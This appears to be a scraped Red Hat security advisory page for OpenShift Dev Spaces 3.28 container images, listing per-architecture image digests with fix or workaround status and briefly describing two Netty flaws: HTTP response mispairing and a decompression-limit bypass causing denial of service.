| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
Workaround
|
A flaw was found in Netty, an asynchronous, event-driven network application framework. A remote attacker could exploit this vulnerability by sending a specific sequence of HTTP responses (103, followed by a 200 with a GET body, then another 200 for a HEAD request) when the client pipelines GET then HEAD requests. This can cause the HttpClientCodec to incorrectly pair responses, leading to subsequent HTTP responses being parsed from the wrong offset. This issue may result in information disclosure or other data integrity problems due to misinterpretation of network traffic.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:83e1013b0ce89c1f4fc0038c1cb7eab2fd541a6fb1de6a0596fe669a76cde1f4_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:9d47eee451c3d7c7a0c2d83824849ac4053110107997a41df26fe28f9b4749de_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:bb9e332650eb73ce20accc25d8bc73bb935e39e0bc6a9b0e7b163707ae25ce6f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0ce3e6baa0af251b5ae5e8cc64de363aa144c420e1416a2a7bf522aefe0b6dd3_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:324758a4c214f743ba3f38eee3ae2c3f42eac80ac4c10801e103fc531d73cf51_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:82994d108c21e3f53c2d87bdec8ddcdb0c0f81c7f1ed93ac996fe83046ea8ed1_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:b1b3d7416bc5c1609fa890229fc0a0809bc1906813bb4834f57dc610f88974c1_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:5bcd49999db0f7ac5fbc2461c7ac50dec267ee8b4f64c95bdcd746188ab0bfa0_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:62ecbc41b3f1d3cd81e9593fdacac8397d1fc3f616717b247346ac218b7a2ff7_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ee3d2e13995479495aa2a2f3b7a8f8133f7b69d0e753b00e3fe2ee00416b3a9_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/configbump-rhel9@sha256:b52e83ecc17aefda4a83671c267b3086bb5f92d78259c3e3b2b389042bac7230_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:1cef563af30567f7aba3baeb6fa94494f93ac07350a23fabaa67d079f780f640_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ae7dc192f8ca8c78dc6eb12ef2846b45057e22e183207743aad9261fb5adcb6e_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ca07c7ae5cdcf93df21348d92c4828e4615b324f2f765907b3459f0d5090c628_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/dashboard-rhel9@sha256:dee20a799ccf5bae94ed50fd2d79ea162cd7384990427db93281fe590d6c7767_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:f78d91e983f0f8be019382c2fb620a655bf9f8204bd839e9bfb9c35e1ab8fc90_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4757ac1e8c5a53e2d9a7ce896dbcc1232806a47a29470285c6fee9778a2f0b25_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:4e4a72be08cf691ee40dc79d2e625a5b59cf709e15219537ee04a1f03a3df23e_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a5b3c16ca82c2585debbef262d8de80bb8566384c916915d9fce92d233268d1c_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:dd4b506d04a2e7be2c62c53a7e1f60fe828ba7f0fc2aab7f6a752f1a4c4e699b_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:21d1288562fc757e4714cde2c253c077fba1b7762ab4041e8b3f55d9da1e7b82_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:2423f169dcd795c9326d59d953b4507485bf2ef8971f066969dfb2ca921bdf1f_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:5e4c074f39614f529e79c8de011446a0b621fb189485eff0061f95f99f0950f8_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:f1cf981295bdfddb68c8cb83e03da7cbec9aada7dce16586a1508351b11c2e73_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0de97d2e0e6589cfd3889eca0284154e857c4deef4ab45420e0d75bfc8030252_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:12a042cb9e94c6502b61c6d08a49bc8b81f8d3e23932b08c29566906508801d8_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:25137cf516214eac04d5f1fd2ad9a38658e8fc741600b50b4c44f00db437cf01_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:5cb0df6d628f764eead0f67206b7251b737932ae04f81dd8c1fd416d2c1be455_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:060059363ac7718e9599e0612c95b583b563fac5a6616dfecc9c42413b2a3f56_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:1bd73bae94af4a5be1b62e555df3a1b863f22c427f95d2bbbd24e4ffcce7a264_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:baff02ec968933899873d989d8faf4fb27aedcbca5406009408638678a832b96_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:e9347202b67b4a2ad17b820af7148d4473764996ce1368d5460b6fff2d79935a_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:0912cc02b70a7cc6895cdfde15647865de99f03880715c6b8e584adf70c14707_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1d4269b06d396a7ec1e952daa47a4bd5b00915d6d0cd5a3270fe471a6a75517b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:1e2b5bff8974b54038cf635faaa293458bcfa2e75a9ee57e2712b30d9b35e0ac_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/traefik-rhel9@sha256:6798e67f7d39b831b6c947a50c4420c9d92160079bbd2d62d07b9f991be4abfd_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:1a56d8592fe048ebe0c1549ec0249a5f61842cbb5c58545649b394df98fbae06_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:224939e501ffed4ffe09a5198138486e72b04d1486787a6c4c3abee8cd7dffba_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:c10a24ed873306c38e5d7aa96d9ffa9b71b2e6dac2ee18f557af008ef460d708_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel10@sha256:cb73c78e8214996408490b36f176be3b6d0047a116f705478afd162c8260292d_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:06172d66fc92096c6d1b517ac2edfc35e06255859152ea8aa83ea57bb789bb0b_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:2268f482a70624ca1670675df27f0a6a4e7ea41669f021059ebafbc0465d5411_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:505295ab2811eb723a334501a853eb238c2ec96073f36296226d58fa12aefd3c_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-base-rhel9@sha256:93ae4574a68c0f16acf2146ab09b56e446fd012697c1194cfa9f4ac717a300c2_arm64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:2f672c4b1bc77639a5ccf2f7f923691aefe2ab2e6e76de830a0727633c80af17_s390x | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:763e7470768ecf6551d9d9af7a7a48605ceafaad3e001f48ae08ce94d6facb42_ppc64le | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:80c9c0c3aa02ae7b447c33a8bb9aff07fc243b2b484db28975b79b9007612629_amd64 | — | ||
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/udi-rhel9@sha256:8a4c7ae0ffaa1f6d3b87c60d27817a3d1636a5609cf159dce66d80c2f0ad6f9b_arm64 | — |
A flaw was found in Netty. A remote attacker can bypass the configured decompression limit in the HttpContentDecompressor by sending a specially crafted compressed payload using Brotli (br), Zstandard (zstd), or Snappy content encodings. This can lead to unbounded memory allocation, resulting in an out-of-memory Denial of Service (DoS) for the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:3eda021137370af8e8cf2c996a7a10733824f1d23e56534efd4f46aa40ce7777_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:af397f83a7394b676299501672623ca9c01b8351db0d73531b0bf325e55558f6_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b73dc3b1ac96a877aba609233dc0ae60685716b272e3dc1f8db59c23c438049d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/openvsx-rhel9@sha256:cef4269f4d91814bc144c94718d6aa59c4e03eab341eebf87ec05e38e7b7e49f_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:06d061cdda5ac9ddd48647c2c86b5ceb5a5f25acc7e314ebb319a690af588209_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:80842e498a91358d73a511ec25acc2a6d26dca76c9f775108778700e8541c252_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:a062fd2a510100fc03a5f14102104a34b2e24bddc5661ac95ed39dad6a5f46b9_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fbdf611c5aac4e33644ed8eb5a72b88b5c5a6690f24a64a3cff7002a483827d8_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:4f63b37a50013481f95ca70ea3e0baf257601aa86ba6dd3efe5ad039b3170f04_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:56f4b3132a1785e7a323fc9fb5e1d2040d30a7c8d81fd00a42d619a8881e9492_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:e2d0551322d379e77a72218fb37244f8a187e6ff52ae6f61e7b673c2c23ce39f_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/server-rhel9@sha256:f8200f2b4b8c5cb5a5aef1fa6f8f15297cb720512a0df784629129afc0d5810a_s390x | — |
Vendor Fix
fix
Workaround
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat OpenShift Dev Spaces 3.28:registry.redhat.io/devspaces/code-rhel9@sha256:7e20cd1d638296bcab93a704bfce3ff7cf6c0f7e632e07e69fcacfedf9e8b120_arm64 | — |
Workaround
|
|
